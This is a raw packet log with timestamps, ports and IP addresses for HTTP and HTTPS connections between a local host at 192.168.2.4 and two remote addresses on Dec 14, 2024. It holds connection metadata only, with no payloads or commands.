Dec 14, 2024 12:56:43.307693958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.307764053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.307820082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.308624983 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.308763981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.308778048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.309062004 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.309668064 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.309788942 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.309849024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.309914112 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.310587883 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.310678959 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.310693026 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.310702085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.310734034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.310775042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.310775042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.311806917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.312810898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.312829018 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.312844992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.312880993 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.312891960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.312891960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.313002110 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.313910007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.313942909 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.313967943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.314069033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.315009117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.315042973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.315059900 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.315171003 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.315861940 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.315949917 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.316082954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.316132069 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.317107916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.317141056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.317181110 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.317238092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.318365097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.318401098 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.318442106 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.318500042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.319377899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.319452047 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.319534063 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.319611073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.320005894 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:43.320092916 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:43.320683002 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.320715904 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.320825100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.320825100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.321943998 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.321976900 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.322132111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.322132111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.323051929 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.323246002 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.323298931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.324095964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.324157953 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.324170113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.324233055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.325206995 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.325241089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.325268030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.325294971 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.334852934 CET	49837	80	192.168.2.4	34.107.221.82
Dec 14, 2024 12:56:43.378983974 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.379050016 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.379067898 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.389729023 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.390005112 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.390016079 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.398642063 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.398694038 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.398701906 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.411542892 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.411607027 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.411614895 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.425323963 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.425455093 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.425474882 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.437875986 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.437990904 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.437999010 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.451447964 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.451715946 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.451726913 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.463032961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.463165045 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.463190079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.463388920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.463730097 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.463799000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.464620113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.464632988 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.464668989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.464806080 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.464806080 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.464806080 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.464829922 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.465639114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.465694904 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.465730906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.465960026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.466456890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.466510057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.466569901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.466871023 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.467469931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.467521906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.467641115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.468050957 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.468580008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.468688965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.469688892 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.469726086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.469783068 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.469783068 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.470593929 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.470741034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.471630096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.471708059 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.471765041 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.472446918 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.472687006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.472884893 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.472939968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.473246098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.473777056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.473833084 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.474042892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.474576950 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.474638939 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.474647999 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.474751949 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.474880934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.474927902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.474927902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.475922108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.475958109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.476001024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.476064920 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.476906061 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.476941109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.477019072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.477938890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.477992058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.477999926 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.478060007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.478899956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.478954077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.479058027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.479191065 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.480026007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.480109930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.480109930 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.480185032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.481127024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.481163025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.481195927 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.481374025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.482532978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.482568026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.482611895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.482702017 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.483449936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.483521938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.483638048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.483638048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.484178066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.484313011 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.484364986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.484420061 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.485179901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.485341072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.485397100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.485477924 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.486341953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.486438990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.486501932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.486501932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.487345934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.487381935 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.487409115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.487608910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.487673044 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.487919092 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.487927914 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.488321066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.488365889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.488430023 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.488640070 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.489442110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.489478111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.489667892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.489667892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.490406990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.490442991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.490660906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.490660906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.491377115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.491426945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.491514921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.491842985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.492562056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.492597103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.492625952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.492644072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.493582010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.493712902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.493767977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.493858099 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.494699955 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.494749069 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.494755030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.494935036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.495611906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.495851040 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.495919943 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.496000051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.496679068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.496726990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.496956110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.497011900 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.497766972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.497802973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.497864008 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.498776913 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.498855114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.498913050 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.498981953 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.499881029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.499917030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.500391006 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.500459909 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.500459909 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.500478029 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.500730991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.500834942 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.500957012 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.501873016 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.501907110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.501981020 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.502110958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.502903938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.502939939 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.503334999 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.503870010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.504153013 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.504216909 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.504458904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.505019903 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.505053997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.505098104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.505114079 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.506042004 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.506089926 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.506464958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.506464958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.507029057 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.507085085 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.507119894 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.507338047 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.508037090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.508112907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.508181095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.508344889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.509121895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.509181976 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.509241104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.509310961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.510108948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.510154963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.510281086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.510396004 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.511207104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.511262894 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.511337996 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.511404991 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.512249947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.512324095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.512331963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.512392044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.513380051 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.513400078 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.513416052 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.513488054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.513488054 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.513488054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.513505936 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.514501095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.514594078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.514604092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.514664888 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.515389919 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.515599966 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.515669107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.515918016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.516460896 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.516525030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.516644001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.517003059 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.517585039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.517725945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.570935011 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.570965052 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.570985079 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.570996046 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.571069956 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.573273897 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.580570936 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.580642939 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.580651045 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.594100952 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.594592094 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.594625950 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.604470968 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.604556084 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.604569912 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.615189075 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.615468979 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.615485907 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.627016068 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.627248049 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.627280951 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.638391972 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.638463974 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.638473988 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.649061918 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.649693012 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.649709940 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.655448914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.655503035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.655572891 CET	49860	80	192.168.2.4	31.41.244.11
